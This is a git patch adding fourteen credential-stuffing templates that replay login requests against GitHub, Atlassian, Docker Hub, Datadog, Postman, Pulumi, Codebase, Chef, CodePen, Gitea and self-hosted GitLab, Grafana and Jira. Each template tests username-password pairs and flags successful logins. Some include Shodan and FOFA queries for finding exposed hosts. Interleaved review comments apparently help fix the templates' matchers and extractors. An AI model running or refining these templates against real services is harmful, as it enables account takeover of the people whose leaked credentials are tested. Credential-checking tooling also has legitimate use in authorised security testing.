From 6bbd3a0936652c80a99083535f895a3c503e46e9 Mon Sep 17 00:00:00 2001 From: Parth Date: Mon, 8 May 2023 22:35:04 +0530 Subject: [PATCH] added cred template --- .../cloud/atechmedia-codebase.yaml | 55 +++++++++++++++ http/credential-stuffing/cloud/atlassian.yaml | 38 ++++++++++ .../cloud/avnil-pdf-generator.yaml | 37 ++++++++++ http/credential-stuffing/cloud/chefapi.yaml | 32 +++++++++ http/credential-stuffing/cloud/codepen.yaml | 46 ++++++++++++ http/credential-stuffing/cloud/datadog.yaml | 52 ++++++++++++++ .../credential-stuffing/cloud/docker-hub.yaml | 49 +++++++++++++ http/credential-stuffing/cloud/gitea.yaml | 36 ++++++++++ http/credential-stuffing/cloud/github.yaml | 70 +++++++++++++++++++ http/credential-stuffing/cloud/postman.yaml | 52 ++++++++++++++ http/credential-stuffing/cloud/pulmi.yaml | 43 ++++++++++++ .../self-hosted/gitlab.yaml | 66 +++++++++++++++++ .../self-hosted/grafana.yaml | 56 +++++++++++++++ .../credential-stuffing/self-hosted/jira.yaml | 45 ++++++++++++ 14 files changed, 677 insertions(+) create mode 100644 http/credential-stuffing/cloud/atechmedia-codebase.yaml create mode 100644 http/credential-stuffing/cloud/atlassian.yaml create mode 100644 http/credential-stuffing/cloud/avnil-pdf-generator.yaml create mode 100644 http/credential-stuffing/cloud/chefapi.yaml create mode 100644 http/credential-stuffing/cloud/codepen.yaml create mode 100644 http/credential-stuffing/cloud/datadog.yaml create mode 100644 http/credential-stuffing/cloud/docker-hub.yaml create mode 100644 http/credential-stuffing/cloud/gitea.yaml create mode 100644 http/credential-stuffing/cloud/github.yaml create mode 100644 http/credential-stuffing/cloud/postman.yaml create mode 100644 http/credential-stuffing/cloud/pulmi.yaml create mode 100644 http/credential-stuffing/self-hosted/gitlab.yaml create mode 100644 http/credential-stuffing/self-hosted/grafana.yaml create mode 100644 http/credential-stuffing/self-hosted/jira.yaml 
diff --git a/http/credential-stuffing/cloud/atechmedia-codebase.yaml b/http/credential-stuffing/cloud/atechmedia-codebase.yaml new file mode 100644 index 0000000000..746c0452a7 --- /dev/null +++ b/http/credential-stuffing/cloud/atechmedia-codebase.yaml @@ -0,0 +1,55 @@ +id: atechmedia-codebase-login-check + +info: + name: Atechmedia/Codebase Login Check + author: parthmalhotra, pdresearch + severity: critical + description: Checks for a valid Atechmedia/Codebase account. + reference: + - https://owasp.org/www-community/attacks/Credential_stuffing + tags: login-check,atechmedia,codebase,creds-stuffing + +self-contained: true +requests: + - raw: + - | + GET https://identity.atechmedia.com/login HTTP/1.1 + Host: identity.atechmedia.com + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 + Referer: https://identity.atechmedia.com/login + + - | + POST https://identity.atechmedia.com/login HTTP/1.1 + Host: identity.atechmedia.com + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 + Origin: https://identity.atechmedia.com + Content-Type: application/x-www-form-urlencoded + Referer: https://identity.atechmedia.com/login + Connection: close + + utf8=%E2%9C%93&authenticity_token={{url_encode(authenticity_token)}}&username={{username}}&password={{password}}&commit=Login + + + cookie-reuse: true + extractors: + - type: xpath + name: authenticity_token + part: body + attribute: value + internal: true + xpath: + - /html/body/div/div[2]/div/form/input[2] + - type: dsl + dsl: + - username + - password + + matchers-condition: and + matchers: + - type: word + part: header + words: + - 'Set-Cookie: user_session' + - type: status + status: + - 302 diff --git a/http/credential-stuffing/cloud/atlassian.yaml b/http/credential-stuffing/cloud/atlassian.yaml new file mode 100644 index 0000000000..3c9846da7f --- /dev/null 
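Review bot: Neither `info.description` nor a comment says where `{{username}}` and `{{password}}` come from — there is no `payloads:` section, so a reader cannot tell whether the template expects values passed in by the runner or a wordlist, and the same gap exists in every other template of this commit (atlassian, avnil-pdf-generator, chefapi, codepen, datadog, docker-hub, gitea, github, postman, pulmi, gitlab, grafana, jira). If runner-supplied variables are the intent, one added clause settles it: `description: Checks for a valid Atechmedia/Codebase account; username and password must be supplied as template variables.`. Separately, the `authenticity_token` extractor relies on a positional XPath (`/html/body/div/div[2]/div/form/input[2]`) that breaks on any markup change, while codepen.yaml in this same commit already selects the field by attribute (`//input[@name="authenticity_token"]/@value`); github.yaml and postman.yaml have the same positional-XPath fragility and all three should follow the codepen form.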
+++ b/http/credential-stuffing/cloud/atlassian.yaml @@ -0,0 +1,38 @@ +id: atlassian-login-check + +info: + name: Atlassian Login Check + author: parthmalhotra, pdresearch + severity: critical + description: Checks for a valid atlassian account. + reference: + - https://owasp.org/www-community/attacks/Credential_stuffing + tags: login-check,atlassian,creds-stuffing +self-contained: true +requests: + - raw: + - |- + POST https://auth.atlassian.com/co/authenticate HTTP/1.1 + Host: auth.atlassian.com + Content-Type: application/json + Origin: https://id.atlassian.com + Referer: https://id.atlassian.com/ + Connection: close + + {"username":"{{username}}","password":"{{password}}","state":{"csrfToken":"{{rand_text_alpha(10, "")}}"}} + + extractors: + - type: dsl + dsl: + - username + - password + attack: pitchfork + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"error_description":"Wrong email or password."' + - type: status + status: + - 403 diff --git a/http/credential-stuffing/cloud/avnil-pdf-generator.yaml b/http/credential-stuffing/cloud/avnil-pdf-generator.yaml new file mode 100644 index 0000000000..72059bc350 --- /dev/null +++ b/http/credential-stuffing/cloud/avnil-pdf-generator.yaml 
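Review bot: The matcher pair reports a finding on the failed-login response rather than the successful one: the word matcher looks for `"error_description":"Wrong email or password."` and the status matcher for 403, joined by `and`, so — unless that 403 means something other than its text says — every rejected credential pair will match and an accepted one will not. The check has to key on whatever the success response looks like, which is not visible on this page, and if the error string is kept at all it needs `negative: true`. Also, `attack: pitchfork` here (and in datadog, docker-hub, postman, gitlab and jira) has no `payloads:` block in the template to act on, so as far as the hunk shows it is either a no-op or depends on a payload source that should be named in the description.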
@@ -0,0 +1,37 @@ +id: avnil-pdf-generator-check + +info: + name: useanvil.com Login Check + author: parthmalhotra, pdresearch + severity: critical + description: Checks for a valid avnil pdf generator account. + reference: + - https://owasp.org/www-community/attacks/Credential_stuffing + tags: login-check,avnil-pdf,creds-stuffing + +self-contained: true +requests: + - raw: + - |- + POST https://graphql.useanvil.com/ HTTP/1.1 + Host: graphql.useanvil.com + Content-Length: 367 + Content-Type: application/json + + {"operationName":"LoginMutation","variables":{"email":"{{username}}","password":"{{password}}"},"query":"mutation LoginMutation($email: String, $password: String) {\n login(email: $email, password: $password) {\n eid\n firstName\n lastName\n email\n preferences {\n require2FA\n __typename\n }\n extra\n __typename\n }\n}\n"} + + extractors: + - type: dsl + dsl: + - username + - password + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"email":"' + - '"eid":"' + - type: status + status: + - 200 \ No newline at end of file diff --git a/http/credential-stuffing/cloud/chefapi.yaml b/http/credential-stuffing/cloud/chefapi.yaml new file mode 100644 index 0000000000..e4b6fb994f --- /dev/null +++ b/http/credential-stuffing/cloud/chefapi.yaml 
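Review bot: `Content-Length: 367` is hard-coded in a raw request whose body length changes with every `{{username}}`/`{{password}}` pair, so unless the runner recomputes the header (worth confirming) the declared length is wrong for almost every input and the server will truncate the body or wait for bytes that never come; the same hard-coded header appears in chefapi (`160`), pulmi (`48`) and gitlab (`186`). Dropping the line is the safe fix, and gitea.yaml and docker-hub.yaml in this commit already omit it. Separately, `avnil` in the id, name, description, tags and file name reads as a misspelling of the host `useanvil.com`, and the id `avnil-pdf-generator-check` is the only one in the commit without the `-login-check` suffix.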
@@ -0,0 +1,32 @@ +id: chefio-login-check +info: + name: Chef.io Login Check + author: parthmalhotra, pdresearch + severity: critical + description: Checks for a valid chef.io account. + reference: + - https://owasp.org/www-community/attacks/Credential_stuffing + tags: login-check,chefio,creds-stuffing + +self-contained: true +requests: + - raw: + - |- + POST https://api.chef.io/login HTTP/1.1 + Host: api.chef.io + Content-Type: application/x-www-form-urlencoded + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 + Content-Length: 160 + + utf8=%E2%9C%93&authenticity_token=&authenticity_token=&to=https://api.chef.io/login-success&username={{username}}&password={{password}}&commit=Sign+In + + matchers-condition: and + matchers: + - type: word + part: header + words: + - 'Location: https://api.chef.io/login-success' + - type: status + status: + - 302 diff --git a/http/credential-stuffing/cloud/codepen.yaml b/http/credential-stuffing/cloud/codepen.yaml new file mode 100644 index 0000000000..3390d97ae5 --- /dev/null +++ b/http/credential-stuffing/cloud/codepen.yaml 
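Review bot: The form body sends `authenticity_token=&authenticity_token=&` — the same parameter twice, both empty — which reads as a copy/paste artefact; if the endpoint genuinely accepts an empty token, keep a single occurrence and say why in a comment above the request (`# authenticity_token is deliberately empty: <reason>`), otherwise the duplicate only hides the fact that no token is ever fetched. This is also the one template in the commit without an `extractors:` block, so a finding carries no username/password the way the others do; whether that is intentional is not clear from the hunk.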
@@ -0,0 +1,46 @@ +id: codepen-login-check +info: + name: codepen.io Login Check + author: parthmalhotra, pdresearch + severity: critical + description: Checks for a valid codepen account. + reference: + - https://owasp.org/www-community/attacks/Credential_stuffing + tags: login-check,codepen,creds-stuffing + +self-contained: true +requests: + - raw: + - | + GET https://codepen.io/login HTTP/1.1 + Host: codepen.io + + - | + POST https://codepen.io/login/login HTTP/1.1 + Host: codepen.io + Content-Type: application/x-www-form-urlencoded + X-CSRF-Token: {{token}} + + authenticity_token={{token}}&email={{username}}&password={{password}}&login-type=fullpage + + extractors: + - type: dsl + dsl: + - username + - password + - type: xpath + part: body + xpath: + - '//input[@name="authenticity_token"]/@value' + name: token + internal: true + matchers-condition: and + matchers: + - type: word + part: body + negative: true + words: + - 'The username or password you entered is incorrect, please try again.' + - type: status + status: + - 302 \ No newline at end of file diff --git a/http/credential-stuffing/cloud/datadog.yaml b/http/credential-stuffing/cloud/datadog.yaml new file mode 100644 index 0000000000..9031f57720 --- /dev/null +++ b/http/credential-stuffing/cloud/datadog.yaml 
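Review bot: The matcher effectively reduces to "any 302": its only other condition is a `negative: true` word match on an error message in the body, and a redirect response normally carries little or no body, so the negative check is satisfied vacuously and a failed login that redirects (back to the form, say) would be reported as a valid account. A positive success signal is needed — the other templates in this commit match on a session `Set-Cookie` or a known landing page — but what codepen returns on success is not on this page and has to be confirmed against a real response before the template is trusted.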
@@ -0,0 +1,52 @@ +id: datadog-login-check + +info: + name: Datadog Login Check + author: parthmalhotra, pdresearch + severity: critical + description: Checks for a valid datadog account. + reference: + - https://owasp.org/www-community/attacks/Credential_stuffing + tags: login-check,datadog,creds-stuffing + +self-contained: true +requests: + - raw: + - | + GET https://app.datadoghq.com/account/login HTTP/1.1 + Host: app.datadoghq.com + + - | + POST https://app.datadoghq.com/account/login? HTTP/1.1 + Host: app.datadoghq.com + Content-Type: application/x-www-form-urlencoded + + _authentication_token={{auth_token}}&username={{username}}&password={{password}} + + + cookie-reuse: true + extractors: + - type: regex + name: auth_token + part: body + internal: true + group: 1 + regex: + - "authentication_token": "(.*?)"," + + - type: dsl + dsl: + - username + - password + + attack: pitchfork + matchers-condition: and + matchers: + - type: word + part: header + words: + - 'Set-Cookie: dogweb=' + + - type: status + status: + - 302 \ No newline at end of file diff --git a/http/credential-stuffing/cloud/docker-hub.yaml b/http/credential-stuffing/cloud/docker-hub.yaml new file mode 100644 index 0000000000..c2355a1195 --- /dev/null +++ b/http/credential-stuffing/cloud/docker-hub.yaml 
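Review bot: The extractor line `- "authentication_token": "(.*?)","` does not survive YAML parsing as one regex: the leading double-quoted scalar followed by `: ` turns the sequence item into a mapping, and the trailing `,"` after the second quoted scalar is then a syntax error (or, on a lenient loader, silently loses part of the pattern). Wrap the whole pattern in single quotes so it is a single string: `- '"authentication_token": "(.*?)","'`. The POST target `https://app.datadoghq.com/account/login?` also carries a stray trailing `?`, and the file has no final newline.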
@@ -0,0 +1,49 @@ +id: docker-hub-login-check + +info: + name: Docker Hub Login Check + author: parthmalhotra, pdresearch + severity: critical + description: Checks for a valid atlassian account. + reference: + - https://owasp.org/www-community/attacks/Credential_stuffing + tags: login-check,docker,creds-stuffing + +self-contained: true +requests: + - raw: + - |- + POST https://hub.docker.com/v2/users/login HTTP/1.1 + Host: hub.docker.com + Accept: */* + Accept-Language: en-US;q=0.9,en;q=0.8 + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.95 Safari/537.36 + Connection: close + Content-Type: application/json + + { + "username": "{{username}}", + "password": "{{password}}" + } + + threads: 30 + attack: pitchfork + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'token' + - type: word + part: header + words: + - 'Set-Cookie: token=' + - type: status + status: + - 200 + + extractors: + - type: dsl + dsl: + - username + - password \ No newline at end of file diff --git a/http/credential-stuffing/cloud/gitea.yaml b/http/credential-stuffing/cloud/gitea.yaml new file mode 100644 index 0000000000..7591ca49ab --- /dev/null +++ b/http/credential-stuffing/cloud/gitea.yaml 
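Review bot: `description: Checks for a valid atlassian account.` is copied from atlassian.yaml and names the wrong service; it should read `description: Checks for a valid Docker Hub account.`. `threads: 30` is also baked into the template, which pins concurrency against a third-party API regardless of how the runner is invoked; concurrency is a runtime decision and every other template in this commit leaves it to the runner. The first word matcher, bare `token` in the body, is weak on its own (an error body that mentions a token satisfies it), though the `and` with the `Set-Cookie: token=` header check and the 200 limits the damage.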
@@ -0,0 +1,36 @@ +id: gitea-login-check + +info: + name: gitea.com Login Check + author: parthmalhotra, pdresearch + severity: critical + description: Checks for a valid gitea account. + reference: + - https://owasp.org/www-community/attacks/Credential_stuffing + tags: login-check,gitea,creds-stuffing + +self-contained: true +requests: + - raw: + - |- + POST https://gitea.com/user/login HTTP/1.1 + Host: gitea.com + Content-Type: application/x-www-form-urlencoded + + user_name={{username}}&password={{password}} + + extractors: + - type: dsl + dsl: + - username + - password + + matchers-condition: and + matchers: + - type: word + part: header + words: + - 'Location: /' + - type: status + status: + - 303 \ No newline at end of file diff --git a/http/credential-stuffing/cloud/github.yaml b/http/credential-stuffing/cloud/github.yaml new file mode 100644 index 0000000000..8ba24197c7 --- /dev/null +++ b/http/credential-stuffing/cloud/github.yaml 
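Review bot: The success matcher `Location: /` is a substring match, so any redirect whose target starts with `/` (a redirect back to a login path on failure, for instance) satisfies it together with the 303 and the template will over-report. Anchor the comparison so only a redirect to the root passes, for example a `regex` matcher on `part: header` with `'(?m)^Location: /\r?$'`, and confirm against a real failure response whether Gitea answers with a 303 at all. The `description` could also say the check targets the hosted gitea.com, as the `name` does, since the self-hosted templates in this commit use the same "valid gitea account" wording.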
@@ -0,0 +1,70 @@ +id: github-login-check + +info: + name: Github Login Check + author: parthmalhotra, pdresearch + severity: critical + description: Checks for a valid github account. + reference: + - https://owasp.org/www-community/attacks/Credential_stuffing + tags: login-check,github,creds-stuffing + +self-contained: true +requests: + - raw: + - | + GET https://github.com/login HTTP/1.1 + Host: github.com + + - | + POST https://github.com/session HTTP/1.1 + Host: github.com + Origin: https://github.com + Content-Type: application/x-www-form-urlencoded + Referer: https://github.com/login + + commit=Sign+in&authenticity_token={{authenticity_token}}&login={{username}}&password={{password}}&trusted_device=&webauthn-support=supported&webauthn-iuvpaa-support=unsupported&return_to=https%3A%2F%2Fgithub.com%2Flogin&allow_signup=&client_id=&integration=&required_field_34b7=×tamp={{timestamp}}×tamp_secret={{timestamp_secret}} + + cookie-reuse: true + extractors: + - type: xpath + name: authenticity_token + part: body + attribute: value + internal: true + xpath: + - /html/body/div[3]/main/div/div[4]/form/input[1] + - type: xpath + name: timestamp + part: body + attribute: value + internal: true + xpath: + - /html/body/div[3]/main/div/div[4]/form/div/input[10] + - type: xpath + name: timestamp_secret + part: body + attribute: value + internal: true + xpath: + - /html/body/div[3]/main/div/div[4]/form/div/input[11] + - type: dsl + dsl: + - username + - password + + matchers-condition: or + matchers: + - type: dsl + name: 2fa + dsl: + - "contains(location, 'https://github.com/sessions/two-factor')" + - "status_code==302" + condition: and + + - type: dsl + dsl: + - "contains(to_lower(header), 'set-cookie: logged_in=yes')" + - "contains(to_lower(header), 'set-cookie: user_session=')" + - "status_code==302" + condition: and \ No newline at end of file 
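Review bot: The POST body shows `required_field_34b7=×tamp={{timestamp}}×tamp_secret={{timestamp_secret}}`, and `×` is exactly what the `&times` prefix of `&timestamp` renders to when treated as an HTML entity; if the committed file really contains `×tamp` rather than `&timestamp`, the `timestamp` and `timestamp_secret` fields are never sent as separate parameters and the two xpath extractors that feed them are wasted. Check the raw bytes of the file — if this is only a display artefact of the page, nothing needs to change. The file also lacks a final newline.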
diff --git a/http/credential-stuffing/cloud/postman.yaml b/http/credential-stuffing/cloud/postman.yaml new file mode 100644 index 0000000000..28f617dc11 --- /dev/null +++ b/http/credential-stuffing/cloud/postman.yaml @@ -0,0 +1,52 @@ +id: postman-login-check + +info: + name: Postman Login Check + author: parthmalhotra, pdresearch + severity: critical + description: Checks for a valid postman account. + reference: + - https://owasp.org/www-community/attacks/Credential_stuffing + tags: login-check,postman,creds-stuffing + +self-contained: true +requests: + - raw: + - | + GET https://identity.getpostman.com/login HTTP/1.1 + Host: identity.getpostman.com + Referer: https://identity.getpostman.com/accounts + + - | + POST https://identity.getpostman.com/login HTTP/1.1 + Host: identity.getpostman.com + Content-Type: application/json;charset=UTF-8 + X-Csrf-Token: {{csrfToken}} + Origin: https://identity.getpostman.com + Referer: https://identity.getpostman.com/login + + {"username":"{{username}}","password":"{{password}}"} + + cookie-reuse: true + attack: pitchfork + extractors: + - type: xpath + name: csrfToken + part: body + attribute: value + internal: true + xpath: + - /html/body/div/div/div[1]/form/input + - type: dsl + dsl: + - username + - password + + matchers-condition: and + matchers: + - type: dsl + dsl: + - "contains(to_lower(header), 'set-cookie: getpostmanlogin=yes')" + - "contains(to_lower(body), 'identity.postman.co/continue')" + - "status_code==200" + condition: and \ No newline at end of file diff --git a/http/credential-stuffing/cloud/pulmi.yaml b/http/credential-stuffing/cloud/pulmi.yaml new file mode 100644 index 0000000000..2d281b0382 --- /dev/null +++ b/http/credential-stuffing/cloud/pulmi.yaml 
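Review bot: The `csrfToken` extractor's XPath `/html/body/div/div/div[1]/form/input` has no predicate, so it selects every `<input>` in that form rather than the one carrying the token, and which value lands in `{{csrfToken}}` then depends on the extractor's first-match behaviour instead of on the markup. Narrow it to the token field by name, `//input[@name="<csrf-field-name>"]/@value`, with the real field name taken from the login page (it is not on this page). `matchers-condition: and` over a single matcher is harmless but redundant.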
@@ -0,0 +1,43 @@ +id: pulmi-login-check + +info: + name: pulmi.com Login Check + author: parthmalhotra, pdresearch + severity: critical + description: Checks for a valid github account. + reference: + - https://owasp.org/www-community/attacks/Credential_stuffing + tags: login-check,pulmi,creds-stuffing + +self-contained: true +requests: + - raw: + - |- + POST https://api.pulumi.com/api/console/email/login HTTP/1.1 + Host: api.pulumi.com + Content-Length: 48 + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 + Content-Type: application/json + Origin: https://app.pulumi.com + Referer: https://app.pulumi.com/ + Connection: close + + {"emailOrLogin":"{{username}}","password":"{{password}}"} + + extractors: + - type: dsl + dsl: + - username + - password + + matchers-condition: and + matchers: + - type: word + part: body + words: + - pulumiAccessToken + - userInfo + + - type: status + status: + - 200 \ No newline at end of file diff --git a/http/credential-stuffing/self-hosted/gitlab.yaml b/http/credential-stuffing/self-hosted/gitlab.yaml new file mode 100644 index 0000000000..17194c5174 --- /dev/null +++ b/http/credential-stuffing/self-hosted/gitlab.yaml 
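Review bot: `description: Checks for a valid github account.` names the wrong service (copied from github.yaml) and should read `description: Checks for a valid Pulumi account.`. The id, name, tags and file name all spell the product `pulmi` while every URL in the request says `pulumi`; renaming before the id is relied on by anyone's template filters is cheaper than renaming later. The file also lacks a final newline.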
@@ -0,0 +1,66 @@ +id: gitlab-login-check-self-hosted +info: + name: Gitlab Login Check Self Hosted + author: parthmalhotra, pdresearch + severity: critical + description: Checks for a valid login on self hosted Grafana instance. + reference: + - https://owasp.org/www-community/attacks/Credential_stuffing + metadata: + shodan-query: product:"GitLab Self-Managed" + fofa-query: product="GitLab" + tags: login-check,gitlab,creds-stuffing,self-hosted + +variables: + username: "{{username}}" + password: "{{password}}" + +http: + - raw: + - | + GET /users/sign_in HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 + Accept-Language: en-US,en;q=0.9,de;q=0.8 + Connection: close + + - | + POST /users/sign_in HTTP/1.1 + Host: {{Hostname}} + Content-Length: 186 + Cache-Control: max-age=0 + Origin: http://{{Hostname}} + DNT: 1 + Upgrade-Insecure-Requests: 1 + Content-Type: application/x-www-form-urlencoded + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 + Referer: http://{{Hostname}}/users/sign_in + Accept-Language: en-US,en;q=0.9,de;q=0.8 + Connection: close + + authenticity_token={{url_encode(authenticity_token)}}&user%5Blogin%5D={{username}}&user%5Bpassword%5D={{password}}&user%5Bremember_me%5D=0 + cookie-reuse: true + attack: pitchfork + + extractors: + - type: regex + part: body + internal: true + name: authenticity_token + group: 1 + regex: + - '"/users/sign_in".*?authenticity_token"\s+value="([^"]+)"' + + - type: dsl + dsl: + - username + - password + + matchers-condition: and + req-condition: true + matchers: + - type: dsl + dsl: + - status_code_2 == 302 + - '!contains(to_lower(body_2), "invalid login")' + condition: and 
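Review bot: `description: Checks for a valid login on self hosted Grafana instance.` names the wrong product — this is the GitLab template — and should read `description: Checks for a valid login on a self-hosted GitLab instance.`. The `Origin` and `Referer` headers are built as `http://{{Hostname}}`, hard-coding a scheme that cannot match an HTTPS-only instance, whereas grafana.yaml in the same commit already derives those headers from `{{BaseURL}}`. This is also the only template in the commit that uses the `http:` key while the other thirteen use `requests:`; one convention should be chosen for the whole PR. Finally, the `variables:` block defines `username: "{{username}}"` and `password: "{{password}}"`, a self-reference that presumably means "supplied externally" but says so nowhere — a comment above it such as `# username/password are expected from the runner; the self-reference only declares the variable` would make the intent explicit here and in grafana.yaml and jira.yaml, which carry the same block.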
diff --git a/http/credential-stuffing/self-hosted/grafana.yaml b/http/credential-stuffing/self-hosted/grafana.yaml new file mode 100644 index 0000000000..fed02e654b --- /dev/null +++ b/http/credential-stuffing/self-hosted/grafana.yaml @@ -0,0 +1,56 @@ +id: grafana-login-check + +info: + name: Grafana Login Check + author: parthmalhotra, pdresearch + severity: critical + description: Checks for a valid login on self hosted Grafana instance. + reference: + - https://owasp.org/www-community/attacks/Credential_stuffing + metadata: + shodan-query: title:"Grafana" + fofa-query: title="Grafana" + tags: login-check,grafana,creds-stuffing,self-hosted + +variables: + username: "{{username}}" + password: "{{password}}" + +requests: + - raw: + - |- + POST /login HTTP/1.1 + Host: {{Hostname}} + accept: application/json, text/plain, */* + DNT: 1 + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 + content-type: application/json + Origin: {{BaseURL}} + Referer: {{BaseURL}}/login + Accept-Language: en-US,en;q=0.9,de;q=0.8 + Cookie: redirect_to=%2F + Connection: close + + {"user":"{{username}}","password":"{{password}}"} + + extractors: + - type: dsl + dsl: + - username + - password + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Logged in' + + - type: word + part: header + words: + - 'grafana_session' + + - type: status + status: + - 200 diff --git a/http/credential-stuffing/self-hosted/jira.yaml b/http/credential-stuffing/self-hosted/jira.yaml new file mode 100644 index 0000000000..6a4e5d01d9 --- /dev/null +++ b/http/credential-stuffing/self-hosted/jira.yaml 
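Review bot: Header names in the raw request mix casing — `accept:` and `content-type:` are lowercase while `User-Agent`, `Origin` and `Referer` are capitalised — and since the block is sent verbatim, normalising them (`Accept:`, `Content-Type:`) is a small style fix worth making. The id `grafana-login-check` also lacks the `-self-hosted` suffix that `gitlab-login-check-self-hosted` uses for the same category, and jira.yaml has the same omission; the tags already say `self-hosted`, so the ids should agree with them.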
@@ -0,0 +1,45 @@ +id: jira-login-check + +info: + name: Jira Login Check + author: parthmalhotra, pdresearch + severity: critical + description: Checks for a valid login on self hosted Jira instance. + reference: + - https://owasp.org/www-community/attacks/Credential_stuffing + metadata: + shodan-query: http.component:"Atlassian Jira" + fofa-query: product="JIRA" + tags: login-check,jira,creds-stuffing,self-hosted + +variables: + username: "{{username}}" + password: "{{password}}" + +requests: + - raw: + - |- + POST /rest/gadget/1.0/login HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + Connection: close + + os_username={{username}}&os_password={{password}} + + extractors: + - type: dsl + dsl: + - username + - password + + attack: pitchfork + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"loginSucceeded":true' + - type: status + status: + - 200
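Review bot: The body matcher `"loginSucceeded":true` depends on the exact JSON serialisation with no whitespace after the colon; if the server emits `"loginSucceeded": true` the template silently reports nothing, which is a false negative that nobody will notice. A `regex` matcher with `'"loginSucceeded"\s*:\s*true'` accepts either form at no cost. The endpoint `/rest/gadget/1.0/login` is undocumented here; a one-line comment above the request naming what it is (the gadget login resource) would help the next maintainer.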